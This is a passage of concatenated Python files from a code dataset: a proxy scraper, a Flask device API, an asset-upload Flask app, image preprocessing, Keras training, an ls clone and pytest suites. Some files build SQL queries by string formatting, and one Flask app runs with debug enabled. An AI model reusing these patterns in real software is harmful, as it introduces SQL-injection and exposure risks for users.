port));\n ''' % db\n c = conn.cursor()\n c.execute(creat_tb)\n insert_cmd = \"insert into proxy values ('%s', '%s', '%s')\" % (ip, port, time)\n # 避免重复ip\n try:\n c.execute(insert_cmd)\n except:\n print('duplicate ip %s' % ip)\n conn.commit()\n conn.close()\n\n def checko_db_ip(self):\n # 检测db里面的ip是否可用\n db = self.db.split('.')[0]\n conn = sqlite3.connect(self.db)\n c = conn.cursor()\n for row in c.execute('select DISTINCT ip, port from %s' % db):\n if not self.isAlive(row[0], row[1]):\n delect_cmd = 'delete from %s where ip=%s' % (db, row[0])\n c.execute(delect_cmd)\n c.commit()\n conn.close()\n\n def loop(self, num):\n for i in range(num):\n self.get_html(i+1)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='this is a python get proxy program')\n parser.add_argument('-r', '--nocrawl', action='store_false', default=True, help='stop crawl', dest='r')\n parser.add_argument('-c', '--nocheck', action='store_false', default=True, help='stop check db ip', dest='c')\n parser.add_argument('-n', action='store', choices=[1, 2, 3, 4, 5], help='set crawl number, default 2', default=2, type=int)\n result = parser.parse_args()\n\n myproxy = getProxy()\n if result.r:\n print('start crawl')\n myproxy.loop(result.n)\n else:\n print('stop crawl')\n\n if result.c:\n print('start check db ip')\n myproxy.checko_db_ip()\n else:\n print('stop check db ip')\n\n print('done')\n\n\n","sub_path":"get_proxy_ip.py","file_name":"get_proxy_ip.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"262682759","text":"\"\"\"Test suite for the server module.\"\"\"\nfrom threading import Thread\nfrom time import sleep\n\ntry:\n from unittest.mock import (\n call,\n MagicMock,\n )\nexcept ImportError:\n from mock import (\n call,\n MagicMock,\n )\n\nfrom pytest import (\n approx,\n mark,\n)\n\nimport flashfocus.xutil as xutil\nfrom test.helpers import (\n change_focus,\n SelfDestructingFocusWait,\n WindowWatcher,\n)\n\n\n@mark.parametrize('pre_opacity', [\n (0.8), (1), (None), (0.5)\n])\ndef test_flash_window(flasher, window, pre_opacity):\n if pre_opacity:\n xutil.set_opacity(window, pre_opacity)\n expected_opacity = (\n [pre_opacity] +\n flasher.compute_flash_series(pre_opacity) +\n [pre_opacity])\n # WindowWatcher collapses runs of the same value\n if all(x == expected_opacity[0] for x in expected_opacity):\n expected_opacity = [expected_opacity[0]]\n watcher = WindowWatcher(window)\n watcher.start()\n flasher.flash_window(window)\n assert watcher.report() == approx(expected_opacity, 0.01)\n\n\ndef test_flash_nonexistant_window_ignored(flasher):\n flasher.flash_window(0)\n\n\n@mark.parametrize('focus_indices,flash_indices', [\n # Test normal usage\n ([1, 0, 1], [1, 0, 1]),\n # Test that focusing on same window twice only flashes once\n ([0, 0], [0])\n])\ndef test_monitor_focus(flasher, windows, focus_indices, flash_indices,\n monkeypatch):\n focus_shifts = [windows[i] for i in focus_indices]\n expected_calls = [call(windows[i]) for i in flash_indices]\n flasher.flash_window = MagicMock()\n monkeypatch.setattr(\n xutil, 'wait_for_focus_shift',\n SelfDestructingFocusWait(len(focus_indices) + 2))\n p = Thread(target=flasher.monitor_focus)\n p.start()\n\n for window in focus_shifts:\n change_focus(window)\n sleep(0.2)\n # This would normally be done by the flash_window method\n flasher.locked_windows.discard(window)\n\n p.join()\n assert flasher.flash_window.call_args_list == expected_calls\n\n\n@mark.parametrize(\n 'flash_opacity,preflash_opacity,ntimepoints,expected_result', [\n # test typical usecase\n (0.8, None, 4, [0.8, 0.85, 0.9, 0.95]),\n # test that it still works when flash opacity > preflash opacity\n (1, 0.8, 4, [1, 0.95, 0.9, 0.85]),\n # test that opacity=1 gives same result as opacity=none\n (0.8, 1, 4, [0.8, 0.85, 0.9, 0.95]),\n # test for single chunk\n (0.8, 1, 1, [0.8])\n ]\n)\ndef test_compute_flash_series(flash_opacity, preflash_opacity, ntimepoints,\n expected_result, flasher):\n flasher.flash_opacity = flash_opacity\n flasher.ntimepoints = ntimepoints\n assert (flasher.compute_flash_series(preflash_opacity) ==\n approx(expected_result, 0.0001))\n if preflash_opacity:\n assert (flasher.flash_series_hash[preflash_opacity] ==\n approx(expected_result, 0.0001))\n","sub_path":"test/test_flasher.py","file_name":"test_flasher.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"633248533","text":"from flask import Flask, jsonify, request\nfrom os import getenv\nfrom .utils import http, discover, misc\n\napp = Flask(__name__)\napp.debug = False\napp.discovery_worker = None\n\n\n@app.before_request\ndef before_request():\n if request.headers.get('Authorization') != getenv('DEFAULT_AUTH_KEY'):\n return jsonify(error='Authentication required'), 401\n\n\n@app.route('/devices')\ndef get_devices():\n return jsonify(\n devices=app.discovery_worker.devices,\n _last_update=app.discovery_worker.last_update)\n\n\n@app.route('/devices/', methods=['GET', 'PATCH'])\ndef get_device(device_hash):\n host = misc.find_host_by_hash(app.discovery_worker.devices, device_hash)\n if host is None:\n return jsonify(error='Device not found'), 404\n if request.method == 'GET':\n # implements GetFriendlyName, GetBinaryState\n return jsonify(host)\n elif request.method == 'PATCH':\n # implements SetBinaryState\n try:\n stat = int(request.args['state'])\n assert stat in [0, 1]\n ev = http.set_state(host['device'], stat)\n app.discovery_worker.devices = misc.force_update_devices(app.discovery_worker.devices, host['hash'], ev)\n return jsonify(state=ev)\n except KeyError:\n return jsonify(error='State parameter required'), 400\n except ValueError as e:\n return jsonify(error=f'State must be an integer ({e})'), 400\n except AssertionError:\n return jsonify(error='State must either be 0 or 1'), 400\n\n\ndef start():\n app.discovery_worker = discover.DiscoveryWorker()\n app.discovery_worker.run()\n\n app.run('0.0.0.0', port=80)\n","sub_path":"wemo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"540846554","text":"import imutils\nimport cv2\nimport os\n\ninter = cv2.INTER_AREA\n\n\nfolder = r'D:\\UNIMA\\keras-retinanet\\Keras-retinanet-Training-on-custom-datasets-for-Object-Detection--master\\imagenes\\tarjetas_olaf_recortados\\output\\positivos_negativos_prueba'\nfilenames = os.listdir(folder)\npaths = [os.path.join(folder, filename) for filename in filenames]\nfolder_perspectives = r'D:\\UNIMA\\keras-retinanet\\Keras-retinanet-Training-on-custom-datasets-for-Object-Detection--master\\imagenes\\tarjetas_olaf_recortados\\output\\prueba'\n\n\ni=0\nfor path, filename in zip(paths, filenames): # inte en el primer elemento de path y en el primer elemento de filename\\n\",\n\n image = cv2.imread(path)\n ## CLAHE (Contrast Limited Adaptive Histogram Equalization)\n #clahe = cv2.createCLAHE(clipLimit=3., tileGridSize=(8, 8))\n # convert image from RGB to HSV\n #img_hsv = cv2.cvtColor(image, cv2.COLOR_RGB2HSV)\n ## Histogram equalisation on the V-channel\n #img_hsv[:, :, 2] = clahe.apply(img_hsv[:, :, 2])\n ## convert image back from HSV to RGB\n #image = cv2.cvtColor(img_hsv, cv2.COLOR_HSV2RGB)\n\n\n\n\n # -----Converting image to LAB Color model-----------------------------------\n lab = cv2.cvtColor(image, cv2.COLOR_BGR2LAB)\n\n # -----Splitting the LAB image to different channels-------------------------\n l, a, b = cv2.split(lab)\n\n # -----Applying CLAHE to L-channel-------------------------------------------\n clahe = cv2.createCLAHE(clipLimit=3.0, tileGridSize=(8, 8))\n cl = clahe.apply(l)\n\n\n # -----Merge the CLAHE enhanced L-channel with the a and b channel-----------\n limg = cv2.merge((cl, a, b))\n\n # -----Converting image from LAB Color model to RGB model--------------------\n final = cv2.cvtColor(limg, cv2.COLOR_LAB2BGR)\n\n # _____END_____#\n name = os.path.splitext(filename)[0]\n cv2.imwrite(os.path.join(folder_perspectives, name +\".jpg\"), final)\n ##cv2.imwrite(os.path.join(folder_perspectives, \"positive.\" + str(i) +\".jpg\"), image)\n i=i+1\n","sub_path":"classification_networks/preprocess_image.py","file_name":"preprocess_image.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"78813368","text":"# app.py\n#!bin/python\nfrom logging import debug\nfrom flask import Flask, request, render_template\nfrom bson.objectid import ObjectId\nfrom flask.config import Config\nfrom pymongo import results\nfrom models import searchForm, InsertPubForm, InsertModelForm, InsertImgForm, testImgForm,testPubForm\nfrom flask_bootstrap import Bootstrap\nimport backend as be\nimport os\n\napp = Flask(__name__)\n\nc = be.loadConf()\nstore_type = 'fs'\napp.config.from_mapping(\n SECRET_KEY= os.urandom(32))\nBootstrap(app)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/insertOption')\ndef insertOption():\n return render_template('insertOption.html')\n\n@app.route('/insertPUB', methods=['GET', 'POST'])\ndef insertPUB():\n form = testPubForm()\n if request.method == 'POST' and form.validate_on_submit():\n pub=form.pub.data\n objecthash, extension = be.workOnObj(pub, store_type)\n\n # Prepare metadata\n metadata={}\n \n asset = {}\n asset['title'] = request.form['title']\n asset['description'] = request.form['description']\n asset['authorship'] = request.form['authorship']\n asset['coordinates'] = {}\n asset['coordinates']['latitude'] = None\n asset['coordinates']['longitude'] = None\n asset['license'] = request.form['license']\n metadata['asset'] = asset\n project = {}\n project['name'] = request.form['project_name']\n project['year'] = request.form['project_year']\n project['url'] = request.form['project_url']\n project['partners'] = request.form['project_partners']\n metadata['project'] = project\n\n objectdata = {}\n objectdata['filename'] = pub.filename\n objectdata['type'] = 'publication'\n objectdata['extension'] = extension\n objectdata['hash'] = objecthash\n storedata = {}\n storedata['type'] = store_type\n\n doc = {}\n doc['metadata'] = metadata\n doc['objectdata'] = objectdata\n doc['storedata'] = storedata\n\n\n be.upload2mongo(doc,'pubs')\n return render_template('uploadDone.html')\n return render_template('testPubForm.html',form=form)\n\n@app.route('/insertMODEL', methods=['GET', 'POST'])\ndef insertMODEL():\n form = InsertImgForm()\n if request.method == 'POST' and form.validate_on_submit():\n model = request.files['model']\n objecthash, extension = be.workOnObj(model, store_type)\n\n # Prepare metadata\n metadata={}\n metadata['title'] = request.form['title']\n metadata['description'] = request.form['description']\n metadata['author'] = request.form['author']\n metadata['project'] = request.form['project']\n metadata['year'] = request.form['year']\n metadata['license_url'] = request.form['license_url']\n metadata['extension'] = extension \n metadata['coordinates'] = {}\n coord = request.form['coordinates']\n sepcoord = coord.split(',')\n metadata['coordinates']['latitude'] = sepcoord[0]\n metadata['coordinates']['longitude'] = sepcoord[1]\n\n ## Prepare paradata\n # paradata = {}\n # paradata['unitMeas'] = request.form['unitMeas'] \n # paradata['hasSubModels'] = request.form['hasSubModels']\n # paradata['hasHotspots'] = request.form['hasHotspots']\n ## change it to paradata!!\n metadata['objtype'] = '3dmodel'\n metadata['filename'] = model.filename\n metadata['objecthash'] = objecthash\n metadata['store_type'] = store_type\n\n\n ## Create doc\n # doc = {}\n # doc['metadata'] = metadata\n # doc['paradata'] = paradata\n ## Remember to upload doc instead of metadata!!\n be.upload2mongo(metadata,'models')\n return render_template('uploadDone.html')\n return render_template('uploadObj.html',form=form, obj='3D Model')\n\n@app.route('/insertIMG', methods=['GET', 'POST'])\ndef insertIMG():\n form = InsertImgForm()\n if request.method == 'POST' and form.validate_on_submit():\n# img = request.files['img']\n img = form.img.data\n objecthash, extension = be.workOnObj(img, store_type)\n\n # Prepare metadata\n metadata={}\n metadata['title'] = request.form['title']\n metadata['description'] = request.form['description']\n metadata['author'] = request.form['author']\n metadata['project'] = request.form['project']\n metadata['objtype'] = 'image'\n metadata['year'] = request.form['year']\n metadata['license_url'] = request.form['license_url']\n metadata['extension'] = extension\n metadata['filename'] = img.filename\n metadata['objecthash'] = objecthash\n metadata['store_type'] = store_type\n metadata['coordinates'] = {}\n coord = request.form['coordinates']\n sepcoord = coord.split(',')\n metadata['coordinates']['latitude'] = sepcoord[0]\n metadata['coordinates']['longitude'] = sepcoord[1]\n be.upload2mongo(metadata,'imgs')\n return render_template('uploadDone.html')\n return render_template('uploadObj.html',form=form, obj='Image')\n\n\n@app.route('/getInventory')\ndef getInventory():\n inventory = be.connect2mongo(be.loadConf(),'inventory')\n res = inventory.find()\n return render_template('inventory.html', result=res)\n\n@app.route('/searchOption')\ndef searchOption():\n return render_template('searchOption.html')\n\n@app.route('/search',methods=['GET', 'POST'])\ndef search():\n form = searchForm(request.form)\n coll = request.args.get('coll', None)\n obj = request.args.get('obj', None)\n if request.method == 'POST' and form.validate_on_submit(): \n collection = be.connect2mongo(be.loadConf(), coll)\n query = request.form['query']\n res = collection.find({'$text':{'$search':query}})\n if coll=='inventory':\n return render_template('inventory.html', result=res)\n return render_template('result.html', result=res)\n return render_template('search.html', form=form, obj=obj) \n\n# @app.route('/searchPUB',methods=['GET', 'POST'])\n# def searchPUB():\n# form = SearchPubForm(request.form)\n# if form.validate_on_submit(): #request.method=GET o POST?\n# pubs = be.connect2mongo(be.loadConf(),'pubs')\n# metadata={}\n# metadata['title'] = request.form['title']\n# return render_template('ResultPUB.html',result=pubs.find({'title':request.form['title']}))\n# return render_template('searchPUB.html',form=form)\n\n# @app.route('/searchIMG',methods=['GET', 'POST'])\n# def searchIMG():\n# form = SearchImgForm(request.form)\n# if form.validate_on_submit(): #request.method=GET o POST?\n# imgs = be.connect2mongo(be.loadConf(),'imgs')\n# metadata={}\n# metadata['title'] = request.form['title']\n# return render_template('ResultIMG.html',result=imgs.find({'title':request.form['title']}))\n# return render_template('searchIMG.html',form=form)\n\n# @app.route('/searchModel',methods=['GET', 'POST'])\n# def searchModel():\n# form = SearchModelForm(request.form)\n# if form.validate_on_submit(): #request.method=GET o POST?\n# models = be.connect2mongo(be.loadConf(),'models')\n# metadata={}\n# metadata['title'] = request.form['title']\n# return render_template('ResultIMG.html',result=models.find({'title':request.form['title']}))\n# return render_template('searchModel.html',form=form)\n\n# @app.route('/searchInventory',methods=['GET', 'POST'])\n# def searchInventory():\n# form = SearchInventoryForm(request.form)\n# if form.validate_on_submit(): #request.method=GET o POST?\n# inv = be.connect2mongo(be.loadConf(),'inventory')\n# metadata={}\n# metadata['title'] = request.form['title']\n# return render_template('inventory.html',result=inv.find({'title':request.form['title']}))\n# return render_template('searchInventory.html',form=form)\n\n@app.route('/getImg')\ndef getImg():\n imgs = be.connect2mongo(be.loadConf(),'imgs')\n ID = request.args.get('ID', None)\n img = imgs.find_one({'_id': ObjectId(ID)})\n c = be.loadConf()\n return render_template('getImg.html', img=img, c=c['datastore'])\n\n@app.route('/getObj')\ndef getObj():\n objs = be.connect2mongo(be.loadConf(),'models')\n ID = request.args.get('ID', None)\n obj = objs.find_one({'_id': ObjectId(ID)})\n return render_template('getObj.html', obj=obj)\n\n@app.route('/testImgForm',methods=['GET', 'POST'])\ndef testFORM():\n form = testImgForm()\n if request.method == 'POST' and form.validate_on_submit():\n \n f = form.photo.data\n # f = request.files['photo']\n # filename = secure_filename(f.filename)\n objecthash, extension = be.workOnObj(f, store_type)\n return render_template('uploadDone.html')\n return render_template('testForm.html',form=form)\n@app.route('/testPubForm',methods=['GET', 'POST'])\ndef testPubFORM():\n form = testPubForm()\n if request.method == 'POST' and form.validate_on_submit():\n pub=form.pub.data\n objecthash, extension = be.workOnObj(pub, store_type)\n\n # Prepare metadata\n metadata={}\n \n asset = {}\n asset['title'] = request.form['title']\n asset['description'] = request.form['description']\n asset['authorship'] = request.form['authorship']\n asset['coordinates'] = {}\n asset['coordinates']['latitude'] = None\n asset['coordinates']['longitude'] = None\n asset['license'] = request.form['license']\n metadata['asset'] = asset\n project = {}\n project['name'] = request.form['project_name']\n project['year'] = request.form['project_year']\n project['url'] = request.form['project_url']\n project['partners'] = request.form['project_partners']\n metadata['project'] = project\n\n objectdata = {}\n objectdata['filename'] = pub.filename\n objectdata['type'] = 'publication'\n objectdata['extension'] = extension\n objectdata['hash'] = objecthash\n storedata = {}\n storedata['type'] = store_type\n\n doc = {}\n doc['metadata'] = metadata\n doc['objectdata'] = objectdata\n doc['storedata'] = storedata\n\n\n be.upload2mongo(doc,'pubs')\n return render_template('uploadDone.html')\n return render_template('testPubForm.html',form=form)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"600283057","text":"def check_cell_info(cell_obj):\n '''\n Function to validate a cell info object before it is allowed into the\n database\n\n Args:\n cell_obj: an instance of the Cell_info model class\n\n Returns:\n errs: a string describing the error\n (empty if none)\n '''\n def check_time(time_str,errs):\n '''\n Function to parse and validate a time string\n\n Args:\n time_str: the time string\n errs: a list containing strings describing the errors\n\n Returns:\n hr: an int describing the hour\n 00 if not valid\n mn: an int describing the minutes\n 00 if not valid\n errs: a list with any new errors appended\n\n '''\n \n if len(time_str)!=5:\n errs.append('Time values must be 5 characters long i.e. HH:MM')\n col=time_str.index(':')\n if col!=2:\n errs.append('The third character of time values must be\\\n a colon i.e. HH:MM')\n \n hr_str=time_str[:col]\n if not hr_str.isdigit():\n errs.append('the fist two characters of time values must be digits')\n hr='00'\n else:\n hr=int(hr_str)\n if hr>23:\n errs.append('hour values must be less than 24')\n \n mn_str=time_str[col+1:]\n if not mn_str.isdigit():\n errs.append('the last two characters of time values must be digits')\n mn='00'\n else:\n mn=int(mn_str)\n if mn>59:\n errs.append('minute values must be less than 60')\n \n return [hr, mn, errs]\n \n errs=[]\n #check takt\n print('checking cell')\n if type(cell_obj.takt)==str:\n if not cell_obj.takt.isdigit():\n errs.append('takt must be an integer')\n\n hrs=[]\n mns=[]\n #check all times\n for shift in cell_obj.shifts:\n [start_hr, start_mn, errs] = check_time(shift['start'],errs)\n hrs.append(start_hr)\n mns.append(start_mn)\n for brk in shift['breaks']:\n [start_hr, start_mn, errs] = check_time(brk[0],errs)\n hrs.append(start_hr)\n mns.append(start_mn)\n [end_hr, end_mn, errs] = check_time(brk[1],errs)\n hrs.append(end_hr)\n mns.append(end_mn) \n [start_hr, start_mn, errs] = check_time(shift['end'],errs)\n \n\n if len(errs)<1:\n failed=False\n for i in range(1,len(hrs)):\n #correct crossing midnight\n same_hr=hrs[i]==hrs[0] and mns[i]'.join(errs)\n\n\ndef check_ignore(usr_str):\n '''fucntion to check the string submitted by the user for the tools to\n ignore, should be in 'T1,T2,T3' format\n\n Args:\n usr_str: a string that the user put into the form\n\n Returns:\n scrubbed: a scrubbed string safe to enter into the db\n '''\n \n usr_list=usr_str.split(',')\n\n output_list=[]\n for item in usr_list:\n tool_num=''\n for char in item:\n if char.isdigit():\n tool_num+=char\n if len(tool_num)>0:\n output_list.append('T'+tool_num)\n \n scrubbed=','.join(output_list)\n\n return scrubbed\n \n \nif __name__=='__main__':\n print(check_ignore('T1,T2,T3'))\n print(check_ignore('t1,t2,t3'))\n print(check_ignore('tool1, tool2, tool3'))\n print(check_ignore('this is 4 times the junk'))\n print(check_ignore('db984fg7rnht 7hn 2'))\n","sub_path":"app/util_funcs.py","file_name":"util_funcs.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"402652381","text":"from imports import *\nfrom scripts.dataset.dataset_functions import *\nfrom scripts.processing.shared_processing_functions import *\nfrom scripts.processing.processing_streamlined import *\nfrom scripts.training.shared_model_functions import *\n\n\n\n''' The following functions are only used by the streamlined version of the pipeline (using tf.data.Dataset) '''\n\n\n\ndef preprocess_data_and_train_model(app):\n\n try: \n\n # print the user-selected processing and training parameters\n print_processing_selections(app)\n print_training_selections(app)\n\n\n # get train, validation, test files\n train_files, val_files, test_files = split_datasets(app)\n print('----------------------------- Done preparing datasets! -----------------------------', '\\n\\n')\n\n\n\n # locally define important dataset and model parameters\n all_labels = get_all_labels(app)\n batch_size = int(app.batch_size_scale.get())\n epoch_num = int(app.epochs_scale.get())\n model_architecture = app.selected_model_architecture.get()\n\n \n print('-------------------------- Defining dataset preprocessing --------------------------', '\\n\\n')\n # get feature and label arrays for each of the file splits\n train_dataset = preprocess_files(train_files, app, all_labels)\n val_dataset = preprocess_files(val_files, app, all_labels)\n test_dataset = preprocess_files(test_files, app, all_labels)\n app.data_for_full_int = preprocess_files(train_files, app, all_labels, representative = True)\n\n # batch the datasets above\n train_dataset_batched = train_dataset.batch(batch_size)\n val_dataset_batched = val_dataset.batch(batch_size)\n test_dataset_batched = test_dataset.batch(batch_size)\n\n\n\n \n print('--------------------------- Checking a training example ---------------------------', '\\n\\n')\n # get an example from the training data to extract the input_shape\n # also define the reshape_shape as well as the number of classes\n # print('train_dataset.take(1): ', train_dataset.take(1))\n for example_feature_map, example_label in train_dataset.take(1):\n continue\n example_feature_map = example_feature_map.numpy()\n input_shape = example_feature_map.shape\n # reshape_shape_without_extra_axis = get_reshape_shape(app)\n # reshape_shape = reshape_shape_without_extra_axis + (1,)\n num_of_classes = len(all_labels)\n\n # print important parameters\n print('example_feature_map: ', example_feature_map)\n print('example_feature_map.shape: ', example_feature_map.shape)\n print('example_label: ', example_label)\n print('example_label.shape: ', example_label.shape, '\\n')\n print('input_shape: ', input_shape)\n # print('reshape_shape: ', reshape_shape)\n print('num_of_classes: ', num_of_classes, '\\n')\n\n # plot an example feature map\n # actually breaks the code later during training\n # plot_example_feature_map(example_feature_map, reshape_shape_without_extra_axis)\n\n\n print('------------------------ Starting compilation and training ------------------------', '\\n\\n')\n # create and compile first model\n model = create_and_compile_model(model_architecture = model_architecture,\n input_shape = input_shape,\n num_of_classes = num_of_classes,\n quantization_aware = False)\n\n # train\n model.fit(train_dataset_batched,\n validation_data = val_dataset_batched,\n epochs = epoch_num,\n callbacks = create_callback_list(app))\n\n # evaluate and print test accuracy\n evaluate_print_test_acc(app, model, test_dataset_batched)\n\n\n\n\n app.menu_label.configure(text = \"Retraining for quantization...\")\n quantization_aware_model = create_and_compile_model(model_architecture = model_architecture,\n input_shape = input_shape,\n num_of_classes = num_of_classes,\n quantization_aware = True)\n\n # train again\n quantization_aware_model.fit(train_dataset_batched,\n validation_data = val_dataset_batched,\n epochs = epoch_num,\n callbacks = create_callback_list(app, model_checkpoint=False))\n\n # evaluate and print test accuracy\n evaluate_print_test_acc(app, quantization_aware_model, test_dataset_batched)\n\n # delete the weights saved by the first model, since they have been loaded into\n # the quantization aware model at the start of training and are no longer needed\n os.remove('best_model_weights.h5')\n\n\n\n app.menu_label.configure(text = \"Done training!\")\n model = quantization_aware_model\n app.model = model\n \n except Exception as exception:\n app.menu_label.configure(text = str(exception))","sub_path":"scripts/training/training_streamlined.py","file_name":"training_streamlined.py","file_ext":"py","file_size_in_byte":4898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"126686703","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nfrom time import localtime, strftime\nimport locale \n\n#DONE: ordering! \n#DONE: dymamic orderlist <--\n#DONE: /ls.py /home -s /var doesn't works <-- \n#TODO: total counters\n#TODO: add file, set in path \n#TODO .isoformat instead of strftime \n#TODO: exception handling\n#TODO: symlinks processing\n\ndef parse_args():\n parser = argparse.ArgumentParser(description = 'ls utility analog in python3')\n# parser.add_argument('path', nargs='*', default=['./'], help='path to directory to list')\n parser.add_argument('--hidden', '-H', action='store_true', help='show hidden files [default: off]')\n parser.add_argument('--modified', '-m', action='store_true', help='show modification time [default: off]')\n parser.add_argument('--recursive', '-r', action='store_true', help='recurse into directories [default: off]')\n parser.add_argument('--size', '-s', action='store_true', help='show size [default: off]')\n choices=['m', 'n', 's', 'modified', 'name','size']\n parser.add_argument('--order', '-o', choices=choices, default='n', help='set output order: ' + ', '.join(choices) + '. Default: ' + choices[0])\n return parser.parse_known_args()\n\ndef get_file_info(file_name):\n stat_info = os.stat(file_name)\n size = stat_info.st_size\n mtime = strftime('%Y-%m-%d %H:%M:%S', localtime(stat_info.st_mtime))\n return file_name, size, mtime\n \ndef get_format(args):\n format = ''\n m_format = '{1:<12n}'\n if args.modified:\n format += '{2} '\n m_format = '{1:>12} '\n if args.size:\n format += m_format\n format += '{0}'\n return format\n \ndef print_file_name(fmt, fname, size, mtime):\n print(fmt.format(fname, size, mtime)) \n \ndef get_recursive_entires(top, args):\n entries = []\n for root, dirs, files in os.walk(top):\n if not args.hidden:\n dirs[:] = [dir for dir in dirs if not dir.startswith('.')]\n files = [file for file in files if not file.startswith('.')]\n for file in files:\n name = os.path.join(root, file)\n entries.append(get_file_info(name))\n return entries\n\ndef get_flat_entires(dir, args):\n entries = []\n for entry in os.listdir(dir):\n if args.hidden or not entry.startswith('.'):\n name = os.path.join(dir, entry)\n entries.append(get_file_info(name))\n return entries\n\ndef print_total(dirs_num, files_num):\n dirs_str = 'directory' if dirs_num == 1 else 'directories'\n files_str = 'file' if files_num == 1 else 'files'\n print()\n print('{0} {1}, {2} {3}'.format(dirs_str, dirs_num, files_str, files_num))\n print()\n\ndef print_entries(args, entries):\n sort_key = None\n if args.order.startswith('m'):\n sort_key = lambda entry: entry[2]\n elif args.order.startswith('s'):\n sort_key = lambda entry: entry[1]\n dirs_num = 0\n fmt = get_format(args)\n for entry in sorted(entries, key=sort_key):\n dirs_num = dirs_num + 1 if os.path.isdir(entry[0]) else dirs_num\n print_file_name(fmt, *entry)\n print_total(dirs_num, len(entries) - dirs_num)\n \ndef main():\n locale.setlocale(locale.LC_ALL, '')\n args, directories = parse_args()\n fmt = get_format(args)\n entries = []\n for directory in directories:\n if args.recursive:\n entries += get_recursive_entires(directory, args)\n else:\n entries += get_flat_entires(directory, args)\n print_entries(args, entries)\n \nif __name__ == '__main__':\n main()","sub_path":"py_book/tasks/ls/ls.py","file_name":"ls.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"560991355","text":"import pytest\nimport sqlite3\nimport database as db\nimport credentials as cr\nimport trade as tr\nimport betting as bt\nimport datetime as dt\nfrom datetime import date, timedelta\nimport time\nimport bcrypt\nimport os\n\n# Setup testdb, first remove existing copies\ndef pytest_setup():\n\n\n if os.path.isfile('testdb.db'):\n os.remove('testdb.db') \n db.dbPath = os.path.abspath('testdb.db')\n cr.dbPath = os.path.abspath('testdb.db')\n tr.dbPath = os.path.abspath('testdb.db')\n bt.dbPath = os.path.abspath('testdb.db')\n\n db.initialise()\n email1 = 'test@gmail.com'\n email2 = 'test2@gmail.com'\n email3 = 'test3@gmail.com'\n email5 = 'test5@gmail.com'\n email6 = 'test6@gmail.com'\n hashed1 = bcrypt.hashpw(b'password1', bcrypt.gensalt()).decode()\n hashed2 = bcrypt.hashpw(b'password2', bcrypt.gensalt()).decode()\n hashed3 = bcrypt.hashpw(b'password3', bcrypt.gensalt()).decode()\n\n conn = sqlite3.connect('testdb.db')\n cur = conn.cursor()\n sql = 'INSERT INTO account (email, password, capital, secQ, secA) VALUES (\\'{}\\', \\'{}\\', 10000, \\'{}\\', \\'{}\\')'.format(email1, hashed1, 'q', 'a')\n cur.execute(sql)\n sql = 'INSERT INTO account (email, password, capital, secQ, secA) VALUES (\\'{}\\', \\'{}\\', 10000, \\'{}\\', \\'{}\\')'.format(email2, hashed2, 'q', 'a')\n cur.execute(sql)\n sql = 'INSERT INTO account (email, password, capital, secQ, secA) VALUES (\\'{}\\', \\'{}\\', 10000, \\'{}\\', \\'{}\\')'.format(email3, hashed3, 'q', 'a')\n cur.execute(sql)\n sql = 'INSERT INTO account (email, password, capital, secQ, secA) VALUES (\\'{}\\', \\'{}\\', 10000, \\'{}\\', \\'{}\\')'.format(email5, hashed3, 'q', 'a')\n cur.execute(sql)\n sql = 'INSERT INTO account (email, password, capital, secQ, secA) VALUES (\\'{}\\', \\'{}\\', 1, \\'{}\\', \\'{}\\')'.format(email6, hashed3, 'q', 'a')\n cur.execute(sql)\n\n conn.commit()\n conn.close()\n\n user_id1 = tr.getUserId(email1)\n user_id2 = tr.getUserId(email2)\n user_id3 = tr.getUserId(email3)\n user_id5 = tr.getUserId(email5)\n\n today = dt.date.today()\n start_date = today + timedelta(days = -10)\n start_date2 = today + timedelta(days = -20)\n start_date3 = today + timedelta(days = -2)\n start_date = time.mktime(start_date.timetuple())\n start_date2 = time.mktime(start_date2.timetuple())\n start_date3 = time.mktime(start_date3.timetuple())\n\n\n conn = sqlite3.connect('testdb.db')\n cur = conn.cursor()\n sql = 'INSERT INTO betting (user_id, company_id, bet_amount, growth, start_price, start_date, multiplier) VALUES (\\'{}\\', 115, 10, 1, 0, \\'{}\\', 10)'.format(user_id1, start_date)\n cur.execute(sql)\n\n sql = 'INSERT INTO betting (user_id, company_id, bet_amount, growth, start_price, start_date, multiplier) VALUES (\\'{}\\', 115, 10, 0, 0, \\'{}\\', 10)'.format(user_id2, start_date2)\n cur.execute(sql)\n\n sql = 'INSERT INTO betting (user_id, company_id, bet_amount, growth, start_price, start_date, multiplier) VALUES (\\'{}\\', 115, 10, 0, 0, \\'{}\\', 10)'.format(user_id5, start_date3)\n cur.execute(sql)\n\n conn.commit()\n conn.close()\n\npytest_setup()\n\ndef test_checkBet():\n email1 = 'test@gmail.com'\n email2 = 'test2@gmail.com'\n user_id1 = tr.getUserId(email1)\n user_id2 = tr.getUserId(email2)\n user_id3 = 9999\n assert True == bt.checkBet(user_id1)\n assert True == bt.checkBet(user_id2)\n assert False == bt.checkBet(user_id3)\n\ndef test_createBet():\n email1 = 'test@gmail.com'\n email2 = 'test2@gmail.com'\n email3 = 'test3@gmail.com'\n email4 = 'test4@gmail.com'\n email6 = 'test6@gmail.com'\n valid = 'CBA'\n invalid = '111'\n user_id3 = tr.getUserId(email3)\n\n with pytest.raises(Exception, match=r\"Email doesn't 